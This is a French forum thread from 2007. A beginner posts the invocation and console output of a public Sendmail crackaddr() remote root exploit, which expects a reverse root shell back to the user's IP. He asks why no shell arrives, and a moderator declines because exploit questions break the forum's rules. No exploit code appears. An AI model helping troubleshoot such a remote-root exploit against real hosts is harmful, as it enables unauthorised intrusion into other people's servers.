Bugs avec remote exploits

Fermé
vreezver Messages postés 5 Date d'inscription mardi 16 octobre 2007 Statut Membre Dernière intervention 23 novembre 2007 - 16 oct. 2007 à 16:28
mamiemando Messages postés 33410 Date d'inscription jeudi 12 mai 2005 Statut Modérateur Dernière intervention 2 décembre 2024 - 16 oct. 2007 à 19:39
Bonjour,

je suis debutant dans la securite informatique.
je m'interesse surtout aux exploits et a l'intrusion reseau.
je suis presentement en train de tester le bug (crackaddr()) en remote du sendmail 8.10.x.
voici mon probleme:

--------------------------------
vreezver@Linux:[$] ./exploit <target_ip> <mon_ip> <targer_number> # ici le target number est 0

Sendmail <8.12.8 crackaddr() exploit by bysin
from the l33tsecurity crew

Resolving address... Address found
Connecting... Connected!
Sending exploit... Exploit sent!
Waiting for root prompt... # Ensuite plus rien... J'ai beau faire un netcat, en vain.

vreezver@Linux:[$]
-------------------------------------------------------
je pense que le probleme vient du fait que je travaille a partir d'un reseau local et que je recois la connexion internet d'un serveur.

-peut etre que le "root prompt" est bloqué par un firewall (le notre peut etre ou celui du target)

-peut etre que c'est le fait que le "mon_ip" n'est pas le bon, car je ne sais pas si je devrais utiliser le IP externe de ma machine ou celui du LAN.

La question centrale est : "Est ce que je recois vraiment le shell? si oui pourquoi je n'arrive pas a l'utiliser?"

Merci de votre interet a me repondre et si possible envoyez moi la reponse par mail
vreezver@yahoo.fr

1 réponse

mamiemando Messages postés 33410 Date d'inscription jeudi 12 mai 2005 Statut Modérateur Dernière intervention 2 décembre 2024 7 808
16 oct. 2007 à 19:39
Le problème c'est qu'on a aucun moyen de savoir si tes intentions d'utiliser cet exploit sont nobles ou pas. Or tout ce qui est en rapport avec cracker un logiciel, hacker une machine, ou utiliser un exploit seront classés hors charte et supprimés par les modérateurs.

Encore désolée
0